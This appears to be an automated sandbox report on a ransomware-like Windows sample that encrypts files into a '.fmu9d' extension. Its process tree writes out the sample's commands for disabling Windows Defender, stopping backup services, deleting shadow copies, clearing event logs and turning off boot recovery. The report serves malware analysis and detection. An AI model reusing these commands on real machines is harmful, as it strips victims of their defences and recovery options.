| File opened for modification | C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_I43Fb5E1LwI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_link_18.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_rnudMbOH3fU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_5Po6Ebfagms0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8041_40x40x32.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_Yx9WfN-CpJg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ul-oob.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_It0oHGMeD-c0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Density_Hollow.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxSignature.p7x | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\over-arrow-navigation.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_yZxScI3L8XQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_O7fsKlOqOu00.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_rt4lVhRbHqE0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rounded Rectangle.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\plugin.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_V3YMC68TTfg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_83lKZbk3zcs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\BooleanIntersect.scale-180.png | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\progress.gif | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe
"C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_12cc1" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_12cc1" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_12cc1" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SYSTEM32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SYSTEM32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SYSTEM32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
Network
| Country | Destination | Domain | Proto |
| US | 52.109.12.20:443 | tcp | |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
memory/3996-115-0x0000000000000000-mapping.dmp
memory/804-116-0x0000000000000000-mapping.dmp
memory/852-117-0x0000000000000000-mapping.dmp
memory/1028-118-0x0000000000000000-mapping.dmp
memory/3516-119-0x0000000000000000-mapping.dmp
memory/3568-120-0x0000000000000000-mapping.dmp
memory/652-121-0x0000000000000000-mapping.dmp
memory/1588-122-0x0000000000000000-mapping.dmp
memory/3420-123-0x0000000000000000-mapping.dmp
memory/3764-124-0x0000000000000000-mapping.dmp
memory/3708-125-0x0000000000000000-mapping.dmp
memory/1724-126-0x0000000000000000-mapping.dmp
memory/1528-127-0x0000000000000000-mapping.dmp
memory/500-128-0x0000000000000000-mapping.dmp
memory/856-129-0x0000000000000000-mapping.dmp
memory/1684-130-0x0000000000000000-mapping.dmp
memory/2688-131-0x0000000000000000-mapping.dmp
memory/3148-132-0x0000000000000000-mapping.dmp
memory/3000-133-0x0000000000000000-mapping.dmp
memory/1108-134-0x0000000000000000-mapping.dmp
memory/4084-135-0x0000000000000000-mapping.dmp
memory/1160-136-0x0000000000000000-mapping.dmp
memory/1952-137-0x0000000000000000-mapping.dmp
memory/1140-138-0x0000000000000000-mapping.dmp
memory/1480-139-0x0000000000000000-mapping.dmp
memory/1616-140-0x0000000000000000-mapping.dmp
memory/3936-141-0x0000000000000000-mapping.dmp
memory/1476-142-0x0000000000000000-mapping.dmp
memory/2384-143-0x0000000000000000-mapping.dmp
memory/2008-144-0x0000000000000000-mapping.dmp
memory/3308-145-0x0000000000000000-mapping.dmp
memory/3500-146-0x0000000000000000-mapping.dmp
memory/1228-147-0x0000000000000000-mapping.dmp
memory/1352-148-0x0000000000000000-mapping.dmp
memory/2160-149-0x0000000000000000-mapping.dmp
memory/3768-150-0x0000000000000000-mapping.dmp
memory/1516-151-0x0000000000000000-mapping.dmp
memory/3828-152-0x0000000000000000-mapping.dmp
memory/2692-153-0x0000000000000000-mapping.dmp
memory/940-154-0x0000000000000000-mapping.dmp
memory/2324-155-0x0000000000000000-mapping.dmp
memory/2388-156-0x0000000000000000-mapping.dmp
memory/1464-157-0x0000000000000000-mapping.dmp
memory/3564-158-0x0000000000000000-mapping.dmp
memory/1540-159-0x0000000000000000-mapping.dmp
memory/3160-160-0x0000000000000000-mapping.dmp
memory/2892-161-0x0000000000000000-mapping.dmp
memory/1684-162-0x0000000000000000-mapping.dmp
memory/8-163-0x0000000000000000-mapping.dmp
memory/2672-164-0x0000000000000000-mapping.dmp
memory/4012-165-0x0000000000000000-mapping.dmp
memory/1192-166-0x0000000000000000-mapping.dmp
memory/2436-167-0x0000000000000000-mapping.dmp
memory/2332-168-0x0000000000000000-mapping.dmp
memory/1844-169-0x0000000000000000-mapping.dmp
memory/1504-170-0x0000000000000000-mapping.dmp
memory/2888-171-0x0000000000000000-mapping.dmp
memory/3048-172-0x0000000000000000-mapping.dmp
memory/3652-173-0x0000000000000000-mapping.dmp
memory/2128-174-0x0000000000000000-mapping.dmp
memory/2264-175-0x0000000000000000-mapping.dmp
memory/3220-176-0x0000000000000000-mapping.dmp
memory/2180-177-0x0000000000000000-mapping.dmp
memory/1284-178-0x0000000000000000-mapping.dmp
memory/3596-180-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp
memory/3596-179-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp
memory/3596-181-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp
memory/3596-182-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp
memory/3596-183-0x000001F362DF0000-0x000001F362E12000-memory.dmp
memory/3596-184-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp
memory/3596-185-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp
memory/3596-186-0x000001F363350000-0x000001F3633C6000-memory.dmp
memory/3596-187-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp
memory/3596-192-0x000001F362FD3000-0x000001F362FD5000-memory.dmp
memory/3596-191-0x000001F362FD0000-0x000001F362FD2000-memory.dmp
memory/3596-213-0x000001F362FD6000-0x000001F362FD8000-memory.dmp
memory/3596-214-0x000001F34A6A0000-0x000001F34A6A2000-memory.dmp
memory/3196-216-0x0000021738E70000-0x0000021738E72000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
memory/3196-217-0x0000021738E70000-0x0000021738E72000-memory.dmp
memory/3196-218-0x0000021738E70000-0x0000021738E72000-memory.dmp
memory/3196-219-0x0000021738E70000-0x0000021738E72000-memory.dmp
memory/3196-220-0x00000217515F0000-0x0000021751612000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4f1870a45bbf2b6f3bf8ffe55acdbebc |
| SHA1 | 7eb6ab5440957493a85b7bc71c4a91446f1e1575 |
| SHA256 | 33c573e776d5f986b4b8aaedf82d6191df350adc18d1950d4fe146a5e0a76726 |
| SHA512 | 6a0b1b6fe0c1f5f1a671dc59b19970825331febbca50ed611693b089277cbec0b147f4393bd0d8934fff793c936720e9aab4609c2e5f31f2a0cd0d7ca42dcfd0 |
memory/3196-222-0x0000021738E70000-0x0000021738E72000-memory.dmp
